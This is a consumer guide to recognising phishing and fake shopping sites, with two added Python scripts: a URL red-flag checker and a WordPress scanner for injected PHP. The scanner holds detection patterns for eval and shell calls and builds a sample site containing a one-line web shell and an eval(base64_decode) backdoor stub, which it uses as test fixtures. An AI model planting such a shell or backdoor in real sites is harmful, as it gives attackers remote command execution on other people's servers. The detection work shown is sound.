How to Spot a Fake Website

The Anti-Phishing Working Group (APWG) reported 41,759 unique phishing sites detected in April 2014, rising to 42,212 in June. Phishing is not just an email problem: the email is usually only the lure, and the page that actually harvests passwords or card numbers lives on the web, sometimes on a domain registered for the purpose and sometimes on a legitimate site that has been compromised. This guide covers both simple and more advanced ways of spotting fake websites so that you can protect yourself from this growing threat. Google does its best to label phishing and malware sites, but automated warnings lag behind new sites, so a little extra knowledge will keep you on your guard at all times.

Basic Tips

When you visit a website and suspect that it isn't genuine, there are a few tell-tale signs to look for.

Unusually low prices

Retailers do sometimes offer big discounts, but they aren't in business to give their goods away. If you spot prices discounted by 50 percent or more, be on your guard immediately. Some sites do sell remnant or overstocked items, but high-end and premium brand merchandise is usually priced using keystone pricing (doubling the wholesale cost) or a steeper markup. Internet resellers and wholesalers buy goods from a manufacturer or another wholesaler and then mark them up by anything from 100 to 300 percent; this is especially true in industries like jewelry and high-end fashion. So a $1,000 ring is very unlikely to be genuinely on offer for 10% of that price. Good deals come along occasionally, but they are rare and hard to find. Branded goods selling for less than outlet store prices should always be viewed with suspicion.

No Reviews

If an ecommerce site has become popular, or if it's offering the best deal in town, it will have independent reviews that back up its authenticity. If you find no reviews, be cautious. Be equally wary of reviews that exist only on tiny review websites, or testimonials attributed to generic names with no detail. The website you're considering buying from might be a phishing site, or it might be selling counterfeit merchandise. A high search ranking is not proof of legitimacy either: scam operators buy visibility through advertising and sponsored links. Searching for the site's domain name together with words like "scam" or "review", and checking the domain's registration date with a WHOIS lookup (a store claiming years of trading from a domain registered last month is a warning sign), are among the few ways you can verify its reputation from the outside.

Poor Grammar and Spelling

Every computer has some form of basic dictionary, and practically every browser has a built-in spell checker, so there is no excuse for spelling mistakes in website content; any errors should immediately set alarm bells ringing. If the website you're looking at contains numerous spelling and grammatical errors, it was probably put together quickly, with the intent of making a quick profit from unsuspecting visitors before it is taken down.

No SSL on the Payment Page

Secure Sockets Layer (SSL), and its successor Transport Layer Security (TLS), was originally developed at Netscape to encrypt the connection between a browser and a server, so that application protocols such as HTTP, POP3 and LDAP can run over a protected channel. When you reach a website's payment page, you should see a padlock icon in the browser's address bar, and the URL should begin with "https" rather than "http". If either is missing, your credit card details are being sent in the clear and can be read or altered by anyone on the network path between you and the site. Whether the site is doing this deliberately or through carelessness is irrelevant: no reputable ecommerce site operates a payment page without HTTPS. The converse does not hold, however. Certificates are cheap or free, and a large share of phishing sites are now served over HTTPS too, so the padlock only tells you that the connection is encrypted to the domain shown in the address bar. It says nothing about who owns that domain, so read the domain name carefully rather than stopping at the padlock.

No Postal Address

Real businesses selling real products provide a physical contact address, so be suspicious of any website that lists no address or contact information. Run the address that is listed through Google Maps or Street View to see what is actually there: a residential house, a mailbox service or an empty lot is a red flag for a supposed retailer. There are exceptions. Google, Amazon and some other large online retailers bury their contact information in legal pages or make it hard to find, but these brands have already established trust in the marketplace, so customers rarely have cause for suspicion. In some countries it is also a legal requirement for a commercial website to publish contact details such as an address or email.

Terms and Conditions Are Obscured, Missing, or Unfavorable

Most businesses have a reasonable refund policy, and for good reason: they want you to be happy with their products, so they accept returns to encourage you to spend. If a website is selling something and you cannot find its terms of service, you are at a disadvantage before you have paid. If the terms explicitly exclude any possibility of a refund for an ordinary commodity (e.g. a purse, jewelry, clothing, an electronic device), walk away. Most manufacturers warrant their products against defects, so that should be covered at the very least. One of the main reasons a seller would offer no warranty is that it isn't selling authentic merchandise.

The Website Isn't an Authorized Reseller

Many large brands dedicate entire sections of their websites to anti-counterfeiting information, and often publish a list of authorized resellers. This is especially true of brands that have repeatedly been copied or had their trademarks violated in the past. If the website you're visiting doesn't appear on such a list or otherwise show that it is an authorized reseller, it may be risky to do business with it. The manufacturer may refuse warranty claims on goods bought from unauthorized sellers, and there is no guarantee of authenticity or quality from the website you're buying from.

Advanced Ways to Spot Phishing on the Web

If you receive a lot of phishing emails, you're probably used to spotting the usual tactics, and some emails are crude enough to give themselves away. A web page is harder to judge: it is easy to clone a genuine site almost pixel for pixel, and a fake store can look every bit as polished as a real one. These advanced tips help you dig deeper when you suspect fraud or malicious content.

Using Online Phishing Scanners

Various free tools let you check whether a website has been reported or shows signs of tampering. No single tool gives a definitive answer (a site may simply be too new to appear in anyone's database), so try several to build a picture:
  1. AVG Threat Labs: Type in a URL and get an instant appraisal of its security. AVG reports whether the site is known to serve malware, so it's a simple test, but one worth trying.
  2. IsItHacked: Scans the website for signs of possible phishing or compromise. It looks for link cloaking, unusual HTTP status codes, strange link formatting and hidden iframes, and also checks the site against Google Safe Browsing, PhishTank and McAfee SiteAdvisor.
  3. PhishTank: A crowdsourced database of compromised sites and of sites set up specifically to phish information from unsuspecting users. It has a phishing checker, a link submission tool, and a verification system in which other users confirm or reject submissions. Once you've submitted a suspicious site, you can track its status through your PhishTank account.
  4. MXToolbox: Checks whether the domain or its mail server's IP address appears on DNS-based blocklists. A listing means the address has been reported as a source of spam or abuse (an open relay is one common reason), which is a reputation signal about the operator rather than proof that the site is phishing; a clean result proves nothing either way.
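Most of the checks in this section, and the HTTPS check earlier, come down to reading the URL carefully before trusting the page. The script below is an added example, not code from the original guide or from any of the scanners listed above. It applies the common red flags offline to a URL string: no HTTPS, a username before an "@" (the browser connects to what follows the "@", not the brand name in front of it), a bare IP address, an odd port, punycode labels, and a well-known brand name that appears in a subdomain, in the path, or in a look-alike spelling rather than as the registered domain. The BRANDS watch list, the HOMOGLYPHS table and the sample URLs are constructed for the example, and registrable_domain() is a deliberate simplification; real tools use the Public Suffix List so that "shop.example.co.uk" is not mis-read as belonging to "co.uk".

```python
"""Offline heuristics for spotting phishing URLs (added example, not from the guide)."""
import ipaddress
from urllib.parse import urlsplit

# Hypothetical watch list of frequently impersonated brands (constructed for this example).
BRANDS = ("paypal", "amazon", "apple", "microsoft", "google")

# Cheap visual substitutions seen in look-alike domains, undone before comparing to BRANDS.
HOMOGLYPHS = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"))


def normalize(label):
    """Map 'paypa1' -> 'paypal', 'rnicrosoft' -> 'microsoft', and so on."""
    for fake, real in HOMOGLYPHS:
        label = label.replace(fake, real)
    return label


def registrable_domain(host):
    """Naive 'last two labels' approximation of the domain somebody registered.

    Simplification: a Public Suffix List lookup is needed for suffixes like co.uk.
    """
    return ".".join(host.split(".")[-2:])


def analyze_url(url):
    """Return the list of red flags found in a URL (empty list = nothing suspicious)."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower().rstrip(".")
    labels = host.split(".")
    flags = []

    if parts.scheme != "https":
        flags.append("not HTTPS: form data would travel in the clear")

    # "https://www.paypal.com@evil.example/" is a request to evil.example.
    if parts.username is not None:
        flags.append("userinfo before '@': the browser connects to %s" % host)

    try:
        ipaddress.ip_address(host)
        flags.append("host is a bare IP address rather than a domain name")
        return flags  # domain-based checks make no sense for an IP address
    except ValueError:
        pass

    if parts.port not in (None, 443):
        flags.append("unusual port %d for a shop or bank" % parts.port)

    if any(label.startswith("xn--") for label in labels):
        flags.append("punycode (xn--) label: possible internationalized look-alike")

    if len(labels) > 4:
        flags.append("deeply nested hostname (%d labels)" % len(labels))

    reg = registrable_domain(host)
    reg_label = reg.split(".")[0]
    for brand in BRANDS:
        if reg_label == brand:
            continue  # the brand's own registered domain: nothing to report
        if brand in normalize(reg_label):
            flags.append("registered domain '%s' imitates %s" % (reg, brand))
        elif any(brand in normalize(label) for label in labels[:-2]):
            flags.append("'%s' is only a subdomain; the registered domain is %s" % (brand, reg))
        elif brand in parts.path.lower():
            flags.append("'%s' appears in the path of unrelated domain %s" % (brand, reg))
    return flags


if __name__ == "__main__":
    # Constructed sample URLs: one genuine-looking, four suspicious.
    for sample in (
        "https://www.paypal.com/signin",
        "http://paypa1-verify.example/login",
        "https://www.paypal.com@evil.example/",
        "https://paypal.com.secure-login.example/update",
        "http://203.0.113.7/amazon/account",
    ):
        print(sample, "->", analyze_url(sample) or ["no red flags"])
```

Treat the output as prompts to look closer, not as verdicts: a brand name in a path is normal on a review blog, and a genuine brand may well own domains under other TLDs that this simplified registrable-domain logic does not know about. The one flag that is never a false positive is the userinfo trick; no legitimate shop needs a username embedded in its URL.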

Check Google's Site Status

Google's Safe Browsing service constantly scans websites and flags malicious content. If it spots a problem, Chrome and other browsers that use the service show a full-page warning before the site loads, and Google adds a warning beneath the search result. This picks up legitimate sites that have been hacked as well as sites set up specifically for phishing. Even if you see no warning, you can run a manual check on the URL at any time using the Safe Browsing site status page in Google's Transparency Report. Check the date of the last scan, and remember that a clean result means only that Google has not flagged the site yet; freshly registered phishing domains are often live for hours before they appear in any blocklist.

Webmaster Resources

Sometimes, phishing sites weren't set up to host malicious content at all. Any website can be hacked and turned into a phishing site. Whether the attackers exploit a vulnerable plugin to inject code, or take over your WordPress admin account with a guessed password, they can embed dangerous code into your website, and putting it right is not easy. Here are some resources that can help if your site is serving phishing content:
  1. Google Webmasters Help for Hacked Sites: If you see a Google warning next to your site in search, head here to learn more and take action. Follow Google's steps as soon as you receive a security notification through your Google Search Console account.
  2. Gotmls for WordPress: There are dozens of security plugins for WordPress, offering myriad tools and protections, but if your site has already been compromised you need one built for cleanup. Gotmls scans the WordPress install and locates and removes known malicious code that isn't supposed to be there, and once the site is clean you can use the same plugin to harden it. Don't rely on a scanner alone, though: it only finds what it recognises. If you have a backup from before the compromise, restore it; either way, update WordPress, themes and plugins, change every password involved (WordPress administrators, FTP or SSH, the database, and the hosting control panel), and look for administrator accounts you did not create.
  3. Request a review from Google: After fixing your site, open the Security Issues report in Search Console and request a review. If Google finds the malware or phishing content gone, the warnings are removed.
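Before running a cleanup plugin, it helps to know where the injected code is. The script below is an added example, not code from the original guide or from the Gotmls plugin; it is a first-pass triage scan, not a cleanup tool. It walks a WordPress tree and flags PHP files that contain the obfuscation idioms typical of web shells and phishing kits (eval() over base64 or compressed data, request parameters passed straight to eval or system, the old preg_replace /e modifier, long base64 blobs), plus any PHP file under wp-content/uploads, a directory that should hold media only. The miniature site written by build_sample_site() is constructed for the example so that it runs offline; on a real install you would point scan_tree() at the document root and compare the core files against WordPress's published checksums (wp-cli's "wp core verify-checksums") as well.

```python
"""Triage scan for injected PHP in a WordPress tree (added example, not from the guide)."""
import os
import re
import shutil
import tempfile

# (compiled regex, reason) pairs. Kept narrow so ordinary plugin code rarely matches.
SUSPICIOUS = [
    (re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
     "eval() over decoded/decompressed data"),
    (re.compile(r"(eval|assert|system|passthru|shell_exec)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I),
     "request parameter passed straight to eval/exec"),
    (re.compile(r"preg_replace\s*\(\s*[\"'][^\"']*/[a-z]*e[a-z]*[\"']", re.I),
     "preg_replace with the /e (eval) modifier"),
    (re.compile(r"[\"'][A-Za-z0-9+/]{200,}={0,2}[\"']"),
     "long base64 blob"),
]

PHP_EXTENSIONS = (".php", ".phtml", ".php5")


def scan_file(path, root):
    """Return the reasons a single PHP file looks suspicious (empty list if clean)."""
    reasons = []
    rel = os.path.relpath(path, root).replace(os.sep, "/")
    if rel.startswith("wp-content/uploads/"):
        reasons.append("PHP file inside wp-content/uploads (should contain media only)")
    try:
        with open(path, "r", errors="replace") as fh:
            code = fh.read()
    except OSError:
        return reasons
    for pattern, reason in SUSPICIOUS:
        if pattern.search(code):
            reasons.append(reason)
    return reasons


def scan_tree(root):
    """Return {relative_path: [reasons]} for every PHP file under root that raised a flag."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXTENSIONS):
                continue
            full = os.path.join(dirpath, name)
            reasons = scan_file(full, root)
            if reasons:
                findings[os.path.relpath(full, root).replace(os.sep, "/")] = reasons
    return findings


def build_sample_site():
    """Write a constructed miniature WordPress tree to a temp dir and return its root."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    files = {
        # Clean theme file: ordinary WordPress code, must not be flagged.
        "wp-content/themes/demo/functions.php":
            "<?php\nadd_action('init', function () { register_nav_menu('main', 'Main'); });\n",
        # Backdoor appended to a theme file: base64 payload fed to eval().
        "wp-content/themes/demo/footer.php":
            "<?php eval(base64_decode('" + "QUFB" * 80 + "')); ?>\n<footer></footer>\n",
        # Web shell hidden among uploads: PHP should never live here at all.
        "wp-content/uploads/2014/06/image.php":
            "<?php if (isset($_POST['c'])) { system($_POST['c']); } ?>\n",
        # Media file: not PHP, ignored by the scan.
        "wp-content/uploads/2014/06/photo.jpg": "placeholder for image bytes\n",
    }
    for rel, body in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    site = build_sample_site()
    try:
        for rel, reasons in sorted(scan_tree(site).items()):
            print(rel)
            for reason in reasons:
                print("   -", reason)
    finally:
        shutil.rmtree(site)
```

A clean scan does not mean a clean site. Attackers also add rogue administrator users, plant redirects in .htaccess, and store payloads in the database (wp_options is a favourite), none of which a file scan sees; that is why a restore from a known-good backup and a full credential rotation belong in every cleanup.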

Summary

According to NetSafe Canada, phishing attacks lured around 80,000 people each day in 2012. Accurate estimates of the potential cost are difficult to come by. For criminals, phishing isn't always about stealing money from bank accounts. It can be used to steal personal data, which is then sold on and shared. Vigilance is important, but once you know the risks, you'll be much safer when you shop online. Run through some checks if you don't completely trust a website, or if you're tempted to spend with an unknown retailer. On the web, if it looks too good to be true, it almost certainly is.

Further Reading and Resources

We have more guides, tutorials, and infographics related to using the internet safely:

7 Online Scams and How to Avoid Them

It sometimes seems that we would all have flying cars by now if all the energy and creativity that went into stealing from people were used constructively. Check out our infographic, 7 Online Scams and How to Avoid Them. It discusses how people try to scam you and how you can protect yourself.